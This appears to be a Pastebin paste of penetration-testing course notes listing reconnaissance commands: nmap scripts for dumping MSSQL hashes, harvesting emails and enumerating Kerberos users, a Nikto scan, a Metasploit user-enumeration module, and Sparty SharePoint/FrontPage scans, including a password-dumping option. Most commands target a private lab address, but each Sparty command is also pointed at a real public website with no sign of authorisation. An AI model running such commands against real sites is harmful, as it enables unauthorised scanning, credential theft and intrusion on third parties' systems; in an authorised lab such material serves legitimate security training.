Advertisement
joemccray

BHS

Jan 4th, 2017
913
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.39 KB | None | 0 0
  1. ##############
  2. # Using Nmap #
  3. ##############
  4. sudo nmap -sV 172.31.43.151
  5.  
  6. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.43.151
  7.  
  8. sudo nmap -Pn -n --open -p80 --script=http-email-harvest --script-args=http-email-harvest.maxpagecount=100,http-email-harvest.maxdepth=10 172.31.43.151
  9.  
  10. sudo nmap -Pn -n --open -p80 --script=http* 172.31.43.151
  11.  
  12. sudo nmap -Pn -n --open -p80 --script=http-title 172.31.43.151
  13.  
  14. sudo nmap -Pn -n --open -p80 --script=http-headers 172.31.43.151
  15.  
  16.  
  17. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.43.151
  18.  
  19. sudo nmap -Pn -n --open -p80 --script='(+http* and not http-icloud-findmyiphone,http-icloud-sendmsg,http-virustotal,)' 172.31.43.151
  20.  
  21. sudo nmap -Pn -n --open -p80 --script http-ntlm-info --script-args http-ntlm-info.root=172.31.43.151
  22.  
  23.  
  24.  
  25.  
  26.  
  27. cd ~
  28. echo bob >> list.txt
  29. echo jim >> list.txt
  30. echo joe >> list.txt
  31. echo tim >> list.txt
  32. echo admin >> list.txt
  33. echo hello >> list.txt
  34. echo rob >> list.txt
  35. echo test >> list.txt
  36. echo aaaaaa >> list.txt
  37. echo larry >> list.txt
  38. echo mario >> list.txt
  39. echo jason >> list.txt
  40. echo john >> list.txt
  41.  
  42. sudo nmap -Pn -n --open -p88 --script-args krb5-enum-users.realm='domain.local',userdb=list.txt 172.31.43.151
  43.  
  44.  
  45.  
  46. ###############
  47. # Using Nikto #
  48. ###############
  49. cd ~/toolz/nikto-2.1.1
  50.  
  51. perl nikto.pl -update
  52.  
  53. perl nikto.pl -h 172.31.43.151
  54.  
  55.  
  56.  
  57.  
  58.  
  59. cd ~/toolz/metasploit
  60.  
  61. ./msfconsole
  62.  
  63. use auxiliary/gather/kerberos_enumusers
  64.  
  65. set RHOSTS 172.31.43.151
  66.  
  67. set DOMAIN Domain.Local
  68.  
  69. set USER_FILE /home/strategicsec/list.txt
  70.  
  71. run
  72.  
  73.  
  74.  
  75.  
  76. ################
  77. # Using Sparty #
  78. ################
  79. cd ~/toolz
  80.  
  81. git clone https://github.com/adityaks/sparty.git
  82.  
  83. cd sparty/sparty_v_0.1/
  84.  
  85.  
  86. [*] Sparty - Usage Parameters and Help !
  87.  
  88. python sparty_v_0.1.py -h
  89.  
  90.  
  91.  
  92. [*] Sharepoint/ Frontpage Version Fingerprinting !
  93.  
  94. python sparty_v_0.1.py -v ms_frontpage -u http://172.31.43.151
  95.  
  96. python sparty_v_0.1.py -v ms_frontpage -u https://www.virginiaaquarium.com/
  97.  
  98.  
  99. [*] Dumping Passwords from Exposed Files !
  100.  
  101. python sparty_v_0.1.py -d dump -u http://172.31.43.151
  102.  
  103. python sparty_v_0.1.py -d dump -u https://www.virginiaaquarium.com/
  104.  
  105.  
  106.  
  107.  
  108.  
  109. [*] Indexing Check for Critical Directories !
  110.  
  111. python sparty_v_0.1.py -l list -u http://172.31.43.151
  112.  
  113. python sparty_v_0.1.py -l list -u https://www.virginiaaquarium.com
  114.  
  115.  
  116.  
  117.  
  118. [*] Scanning Access Rights on Frontpage Files (_vti_pvt and _vti_bin directories) !
  119.  
  120. python sparty_v_0.1.py -f pvt -u http://172.31.43.151
  121.  
  122. python sparty_v_0.1.py -f pvt -u https://www.virginiaaquarium.com
  123.  
  124.  
  125.  
  126.  
  127.  
  128. [*] Scanning Access Rights on Sharepoint Files (forms, layouts and catalogs directories) !
  129.  
  130. python sparty_v_0.1.py -s layouts -u http://172.31.43.151
  131.  
  132. python sparty_v_0.1.py -s layouts -u https://www.virginiaaquarium.com
  133.  
  134.  
  135.  
  136.  
  137.  
  138. [*] Exposed Services Check !
  139.  
  140. python sparty_v_0.1.py -i services -u https://172.31.43.151
  141.  
  142. python sparty_v_0.1.py -i services -u https://www.virginiaaquarium.com
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149. [*] Frontpage RPC Querying !
  150.  
  151. python sparty_v_0.1.py -e rpc_version_check -u https://172.31.43.151
  152.  
  153. python sparty_v_0.1.py -e rpc_version_check -u https://www.virginiaaquarium.com
  154.  
  155.  
  156.  
  157.  
  158.  
  159. [*] Frontpage - Service Listing !
  160.  
  161. python sparty_v_0.1.py -e rpc_service_listing -u http://172.31.43.151
  162.  
  163. python sparty_v_0.1.py -e rpc_service_listing -u https://www.virginiaaquarium.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement